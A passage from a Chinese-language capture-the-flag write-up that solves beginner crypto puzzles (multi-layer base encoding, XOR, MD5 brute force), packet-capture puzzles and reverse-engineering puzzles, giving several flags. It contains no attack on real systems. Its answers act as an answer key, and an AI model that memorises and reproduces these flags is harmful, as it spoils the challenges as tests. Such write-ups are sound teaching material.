$_c=chr($__);
$_=$_.$_c;
}
return $_;
}
print decode("iEJqak3pjIaZ0NzLiITLwWTqzqGAtW2oyOTq1A3pzqas");
?>
解密即得flag
mixed_base64
拿到密文,根據分析是10次隨機base16、32、64
加密,這樣分析每次密文的特點,依次解密即得flag
32
34453534343937413444353435323432344534343439333134453641353133313445374135313331344436413535374134453642344433313445364135323432344535343539333134453434353234323445343435353331344534343535333134443741353533303444374135353332344536423439333234453434353533323445343535313741344435343535373934453435343533313445343435353332344537413431333134453641353537413445353435353331344535343633333534453534343933313445353435393330344534353539333134443534344437373445343534353330344634343535333134453642343933303531353435313331344535343444333134453534344433313445343434443331344536413535333134453641344437413444343435323435344536423444333134443641353234323445353435313331344536413633373734453534353133313444364134443738344534353435333034443741353537393445343435353332353137413535373934453534353533323531374135353332344534343637333134453741353533303445343534353330344536413535373934443741343137413445353435323433344535343539333134453534353933303445353434393330353235343531333234453534343933303531374135353330344536423444333334443434353533333445353434393741344434343444373734453741364233313444364135313331344537413531333035323641353537383444374134313330353235343531333434453534353533313445364136333737344534343535333134443741353533313444374136423330344437413535333234453534353533323445343435363432344534353531333235313641353533323445343534353331344534343541343334453741343133313445374135353739344437413435333034453641353937383445353435393330344535343633333034453534343133313444353435413434344535343539333034463434353234363445343435313330353135343531333134453534353537413444343434443331344534353444333134443534354134333445364135313331344436413532343534453642344433313444364135323434344535343531374134443434363337373445353436333331344436413634343234453534343533333446353435353739344535343535333134453641353234373445353434353741344434343536343234453434363733313445353435413433344534353435333034453534353537413444374134353330344536413532343334453534353933313445353435413434344534343539333035323434354134343445353434393330353137413535333034453642343933303532353435313332344535343439374134443534353234323445343435313331344536413531333134453741353133303532353435353333344536423444333135313534353234323445353434393331344534343532343234453434353933313444364135353331344437413535333035313641353533313444374134313332344534343535373934453534363333323531364135353739344534353435333134453434354134333445374134313331344535343535373934443741343533323531364136333335344535343539333034453534354134343445343535393331344437413541343434453534343933303446343435353332344535343531333035313534353133313445353434443331344536413531333234453534344433313445364135413433344536413531333035313534353234353445364234393331344436413535373734453534353133323531364136333737344535343633333134443641344437373444374134313333344635343535373934453434353533333445343435323436344535343444333235313741353634323445343534353331344436413535333034453435343533313445353435353331344535343535374134453534353133303445353434353332353136413539333034453534353933303532343434443737344535343439333035313534353533313445353435393333344434343535333234453534343937413444353435413433344537413642333134453641353133313445343535353330353236413535374134453642344433303532353435313334344535343531333134453641363337373445343435353331344437413535333134443741364233303444374135353332344535343535333234443741344437373445343535313332353136413535333234453435343533313445343435413433344537413531333034443741353537393444374134353331344535343633333534453534353933303445353435413434344535343439333134453534354134343445353534353330344634343535333134453534353133303531353435313332344535343439333134453534344433313445343534393331344537413531333134453641353133313444364135323435344437413435333134443641353234343445353435353331344535343633373734453534353933313444374135313331344535343535333334463534353533323445343435353332353137413532343634453534363333323531374135323436344534343637333134453641353533323445364234443330344535343535374134453534353933303445364135323433344535343539333034453534353933303445353435393330353234343541343334453534343933313444364135353330344536423439333334443434353533333445353434393741344434343444333134453434353133313444364135313331344536413531333134443741353537383445364234443331344436413532343234453534353533313445364136333737344535343539333134443741353533313444374134313333344635343535373934453534353533323445343435323437344535343435374134443434353133313444374136423331344434343535333034443741343137413446353133443344
16
4E54497A4D5452424E4449314E6A51314E7A51314D6A557A4E6B4D314E6A52424E5459314E4452424E4455314E4455314D7A55304D7A55324E6B49324E4455324E45517A4D5455794E4545314E4455324E7A41314E6A557A4E5455314E5463354E5449314E5459304E4559314D544D774E4545304F4455314E6B4930515451314E544D314E544D314E444D314E6A55314E6A4D7A4D4452454E6B4D314D6A52424E5451314E6A63774E5451314D6A4D784E4545304D7A55794E445532517A55794E545532517A55324E4467314E7A55304E4545304E6A55794D7A417A4E5452434E5459314E5459304E544930525451324E544930517A55304E6B4D334D4455334E54497A4D444D774E7A6B314D6A51314E7A5130526A55784D7A4130525451344E5455314E6A63774E4455314D7A55314D7A6B304D7A55324E5455324E4456424E455132516A55324E4545314E445A434E7A41314E7A55794D7A45304E6A59784E5459304E5463304E5441314D545A444E5459304F4452464E445130515451314E54557A4D444D314E454D314D545A434E6A51314D6A52454E6B4D314D6A52444E54517A4D4463774E5463314D6A64424E5445334F5455794E5455314E6A52474E54457A4D4456424E4467314E545A434E4545304E54557A4D7A45304E6A52434E5459314E545A444E44593052445A444E544930517A55304E6B4930525451324E54497A4D5452424E4451314E6A51314E7A5130525455334E6B4D31515452424E5449314E4452424E4459314D6A55314D7A5530516A55314D7A41324E4455794E546332516A55794E4545314E445A434E7A41314E5455794D7A4532516A63354E5459304E545A444E4559314D7A5A444E5449304F4455324E545130515451314E544D314E6A51324E544D314E6A5A434E6A5130515452454E6B49314D6A55774E545132516A63774E5463314D6A4D774D7A41334F5455794E4455334E4452464E544D32517A56424E4545314D6A55304E4545314E5455314E54557A4E5451304E544532516A59304E54593052444D774E544930515455314E5459334D4455324E54497A4D545A434E7A6B314E6A51314E455530526A557A4E6B4D30525451344E5451314E6A63774E4455314D7A55314D7A6B304D7A55324E5455324D7A4D774E455132516A55324E4545314E445A434E7A51304D7A55794D7A45314E5463354E5459304E545A444E5449314E545A444E5545304F4455314E545130515451324E5449314E544D314E4549314E7A51314E6A51314D6A52454D7A45314D6A52444E5455314E5463774E5459314D7A51314E5455334F5455324E445532517A52464E546332517A52464E4467314E6A55324E6B4D304E54557A4E5459304E6A52434E5459304E5459304E54593052445A434E5449314D6A55304E6B49334D4455334E54497A4D444D314E4451314D6A51314E6A51314D7A55784E6B4D314D6A52424E5455314E6A63774E5459314D7A55314D7A41334F5455794E5455324E4452474E54457A4D4451314D7A6B314D4455304D7A417A4F513D3D
16
NTIzMTRBNDI1NjQ1NzQ1MjUzNkM1NjRBNTY1NDRBNDU1NDU1MzU0MzU2NkI2NDU2NEQzMTUyNEE1NDU2NzA1NjUzNTU1NTc5NTI1NTY0NEY1MTMwNEE0ODU1NkI0QTQ1NTM1NTM1NDM1NjU1NjMzMDRENkM1MjRBNTQ1NjcwNTQ1MjMxNEE0MzUyNDU2QzUyNTU2QzU2NDg1NzU0NEE0NjUyMzAzNTRCNTY1NTY0NTI0RTQ2NTI0QzU0NkM3MDU3NTIzMDMwNzk1MjQ1NzQ0RjUxMzA0RTQ4NTU1NjcwNDU1MzU1Mzk0MzU2NTU2NDVBNEQ2QjU2NEE1NDZCNzA1NzUyMzE0NjYxNTY0NTc0NTA1MTZDNTY0ODRFNDQ0QTQ1NTUzMDM1NEM1MTZCNjQ1MjRENkM1MjRDNTQzMDcwNTc1MjdBNTE3OTUyNTU1NjRGNTEzMDVBNDg1NTZCNEE0NTUzMzE0NjRCNTY1NTZDNDY0RDZDNTI0QzU0NkI0RTQ2NTIzMTRBNDQ1NjQ1NzQ0RTU3NkM1QTRBNTI1NDRBNDY1MjU1MzU0QjU1MzA2NDUyNTc2QjUyNEE1NDZCNzA1NTUyMzE2Qjc5NTY0NTZDNEY1MzZDNTI0ODU2NTQ0QTQ1NTM1NjQ2NTM1NjZCNjQ0QTRENkI1MjUwNTQ2QjcwNTc1MjMwMzA3OTUyNDU3NDRFNTM2QzVBNEE1MjU0NEE1NTU1NTUzNTQ0NTE2QjY0NTY0RDMwNTI0QTU1NTY3MDU2NTIzMTZCNzk1NjQ1NEU0RjUzNkM0RTQ4NTQ1NjcwNDU1MzU1Mzk0MzU2NTU2MzMwNEQ2QjU2NEE1NDZCNzQ0MzUyMzE1NTc5NTY0NTZDNTI1NTZDNUE0ODU1NTQ0QTQ2NTI1NTM1NEI1NzQ1NjQ1MjREMzE1MjRDNTU1NTcwNTY1MzQ1NTU3OTU2NDU2QzRFNTc2QzRFNDg1NjU2NkM0NTUzNTY0NjRCNTY0NTY0NTY0RDZCNTI1MjU0NkI3MDU3NTIzMDM1NDQ1MjQ1NjQ1MzUxNkM1MjRBNTU1NjcwNTY1MzU1MzA3OTUyNTU2NDRGNTEzMDQ1Mzk1MDU0MzAzOQ==
64
52314A4256457452536C564A56544A4554553543566B64564D31524A54567056535555795255644F51304A48556B4A4553553543565563304D6C524A5456705452314A4352456C52556C564857544A465230354B565564524E46524C546C7057523030795245744F51304E4855567045535539435655645A4D6B564A546B70575231466156457450516C56484E444A455530354C516B64524D6C524C54307057527A51795255564F51305A48556B4A455331464B56556C464D6C524C546B4E4652314A445645744E576C5A4A52544A465255354B55306452576B524A546B705552316B7956456C4F536C524856544A4553564653566B644A4D6B5250546B7057523030795245744E536C5A4A52544A5555553544516B64564D30524A5556705652316B7956454E4F536C4E485456704553553943565563304D6B564A546B74435231557956456C52556C5A4855544A465255354B574564524D31524C555570565345557956456C4E576C4E4856566C455356464B564564564D6B5252546B70575230354452456453516C524A55567056535530795255644F5130453950543039
16
R1JBVEtRSlVJVTJETU5CVkdVM1RJTVpVSUUyRUdOQ0JHUkJESU5CVUc0MlRJTVpTR1JCRElRUlVHWTJFR05KVUdRNFRLTlpWR00yREtOQ0NHUVpESU9CVUdZMkVJTkpWR1FaVEtPQlVHNDJEU05LQkdRMlRLT0pWRzQyRUVOQ0ZHUkJES1FKVUlFMlRLTkNFR1JDVEtNWlZJRTJFRU5KU0dRWkRJTkpUR1kyVElOSlRHVTJESVFSVkdJMkRPTkpWR00yREtNSlZJRTJUUU5DQkdVM0RJUVpVR1kyVENOSlNHTVpESU9CVUc0MkVJTktCR1UyVElRUlZHUTJFRU5KWEdRM1RLUUpVSEUyVElNWlNHVVlESVFKVEdVMkRRTkpWR05DREdSQlRJUVpVSU0yRUdOQ0E9PT09
64
GRATKQJUIU2DMNBVGU3TIMZUIE2EGNCBGRBDINBUG42TIMZSGRBDIQRUGY2EGNJUGQ4TKNZVGM2DKNCCGQZDIOBUGY2EINJVGQZTKOBUG42DSNKBGQ2TKOJVG42EENCFGRBDKQJUIE2TKNCEGRCTKMZVIE2EENJSGQZDINJTGY2TINJTGU2DIQRVGI2DONJVGM2DKMJVIE2TQNCBGU3DIQZUGY2TCNJSGMZDIOBUG42EINKBGU2TIQRVGQ2EENJXGQ3TKQJUHE2TIMZSGUYDIQJTGU2DQNJVGNCDGRBTIQZUIM2EGNCA====
32
4A5A4E464557434A4C4A4B444754324B4B464C54495753454B4248464D55435847495A4559574B4E4B5A4A554D4E535A4B524245365453544B52475534515A584A564C4651523248474D5A554B544B57475A495432504A3548553D3D3D3D3D3D
16
JZNFEWCJLJKDGT2KKFLTIWSEKBHFMUCXGIZEYWKNKZJUMNSZKRBE6TSTKRGU4QZXJVLFQR2HGMZUKTKWGZIT2PJ5HU======
64
NZRXIZT3OJQW4ZDPNVPW22LYMVSF6YTBONSTMNC7MVXGG33EMV6Q====
32
nctf{random_mixed_base64_encode}
異性相吸
題目要求將兩個txt內容XOR一下,根據提示,二者的長度是一致的
寫個腳本
#!usr/bin/python
#-*- coding:utf-8 -*-
f_a=open('C:/Users/XX/Desktop/mi.txt','rb')
f_b=open('C:/Users/XX/Desktop/ming.txt','rb')
a="".join(f_a.readlines())
b="".join(f_b.readlines())
s=''
for i,j in zip(a,b):
s+=chr(ord(i)^ord(j))
print s
MD5
直接遍歷
#!usr/bin/python
#-*- coding:utf-8 -*-
import md5
import string
for i in string.uppercase:
for j in string.uppercase:
for k in string.uppercase:
a='TASC'+i+'O3RJMV'+j+'WDJKX'+k+'ZM'
b=md5.md5(a).hexdigest()
if(b[0:5]=='e9032'):
print b
MISC
easy wireshark
聽說抓到他瀏覽網頁的包,flag就在網頁裏
http後有個flag.php
網頁,把保存出來即可。
wireshark 2 (由於不知道爲啥數據包下載不下來,故轉載網上writeup)
下載直接wireshark
查看,
分析得到一個zip
通過一個大神的提示,要找另外一個zip文件,搜索504b0304
找到另外一個zip,裏面有個flag.zip
,保存下來
然後提示文件損壞,用rar
修復一下發現裏面有flag但是有密碼,多次嘗試破解無果,繼續分析數據包
差不多過濾一下http
得到一個secret.txt
追蹤了下secret的tcp流,得到
Reserve
Hello,RE!
windows下的exe文件,直接IDA,打開分析代碼:
int __cdecl main(int argc, const char **argv, const char **envp)
{
_BYTE v4[3]; // [sp+11h] [bp-7Fh]@2
signed int v5; // [sp+75h] [bp-1Bh]@1
signed int v6; // [sp+79h] [bp-17h]@1
signed int v7; // [sp+7Dh] [bp-13h]@1
signed int v8; // [sp+81h] [bp-Fh]@1
signed int v9; // [sp+85h] [bp-Bh]@1
signed int v10; // [sp+89h] [bp-7h]@1
signed __int16 v11; // [sp+8Dh] [bp-3h]@1
char v12; // [sp+8Fh] [bp-1h]@1
__main();
printf("請輸入flag:");
v5 = 1734437990;
v6 = 1818580859;
v7 = 1701670755;
v8 = 1601131615;
v9 = 1465861458;
v10 = 1684828783;
v11 = 32033;
v12 = 0;
while ( scanf("%s", v4) != -1 && strcmp(v4, (const char *)&v5) )
printf("flag錯誤。再試試?\n");
printf("flag正確。\n");
printf("如果是南郵16級新生並且感覺自己喜歡逆向的話記得加羣\n");
printf("羣號在ctf.nuptsast.com的to 16級新生頁面裏\n");
printf("很期待遇見喜歡re的新生23333\n");
getchar();
getchar();
return 0;
}
輸入字符串與內存中字符串進行明碼比較,根據題目中的意思,在IDA中R鍵
能夠直接把數字轉化成字符串,注意小端Little
序讀取
或者直接寫expolit程序:
num=[]
str=[1734437990,1818580859,1701670755,1601131615,1465861458,1684828783,32033]
for i in str:
print hex(i),
print "\n"
num=[0x66,0x6c,0x61,0x67,0x7b,0x57,0x65,0x6c,0x63,0x6f,0x6d,0x65,0x5f,0x54,0x6f,0x5f,0x52,0x45,0x5f,0x57,0x6f,0x72,0x6c,0x64,0x21,0x7d]
flag=""
for i in num:
flag+=chr(i)
print flag
flag:flag{Welcome_To_RE_World!}
RedASM
既然題目是考查閱讀asm,靜態分析的能力,這就沒什麼好說的了
首先,給出的C程序:
int main(int argc, char const *argv[])
{
char input[] = {0x0, 0x67, 0x6e, 0x62, 0x63, 0x7e, 0x74, 0x62, 0x69, 0x6d,
0x55, 0x6a, 0x7f, 0x60, 0x51, 0x66, 0x63, 0x4e, 0x66, 0x7b,
0x71, 0x4a, 0x74, 0x76, 0x6b, 0x70, 0x79, 0x66 , 0x1c};
func(input, 28);
printf("%s\n",input+1);
return 0;
}
其中func函數
用asm給出:
00000000004004e6 <func>:
4004e6: 55 push rbp
4004e7: 48 89 e5 mov rbp,rsp
4004ea: 48 89 7d e8 mov QWORD PTR [rbp-0x18],rdi
4004ee: 89 75 e4 mov DWORD PTR [rbp-0x1c],esi
4004f1: c7 45 fc 01 00 00 00 mov DWORD PTR [rbp-0x4],0x1
4004f8: eb 28 jmp 400522 <func+0x3c>
4004fa: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
4004fd: 48 63 d0 movsxd rdx,eax
400500: 48 8b 45 e8 mov rax,QWORD PTR [rbp-0x18]
400504: 48 01 d0 add rax,rdx
400507: 8b 55 fc mov edx,DWORD PTR [rbp-0x4]
40050a: 48 63 ca movsxd rcx,edx
40050d: 48 8b 55 e8 mov rdx,QWORD PTR [rbp-0x18]
400511: 48 01 ca add rdx,rcx
400514: 0f b6 0a movzx ecx,BYTE PTR [rdx]
400517: 8b 55 fc mov edx,DWORD PTR [rbp-0x4]
40051a: 31 ca xor edx,ecx
40051c: 88 10 mov BYTE PTR [rax],dl
40051e: 83 45 fc 01 add DWORD PTR [rbp-0x4],0x1 ;count指針自加操作
400522: 8b 45 fc mov eax,DWORD PTR [rbp-0x4]
400525: 3b 45 e4 cmp eax,DWORD PTR [rbp-0x1c]
400528: 7e d0 jle 4004fa <func+0x14>
40052a: 90 nop
40052b: 5d pop rbp
40052c: c3 ret
將程序分了一下段,第一段首先是子程序開場白,rdi
,esi
分別是func()
的兩個參數
之後跳到第三段,是判斷esi
與28
的大小關係,就是在判斷字符串長度
第二段,看似略長,實際上就做了這個操作:
for(int i=1;i<=28;i++)
input[i]=input[i]^i
直接寫expolit
:
input= [0x67,0x6e,0x62,0x63,0x7e,0x74,0x62,0x69,0x6d,0x55,0x6a,0x7f, 0x60, 0x51, 0x66, 0x63, 0x4e, 0x66, 0x7b,0x71, 0x4a, 0x74, 0x76, 0x6b, 0x70, 0x79,0x66,0x1c]
#print len(input)
flag=""
num=1
for i in input:
flag+=chr(i^num)
num=num+1
print flag
flag:flag{read_asm_is_the_basic}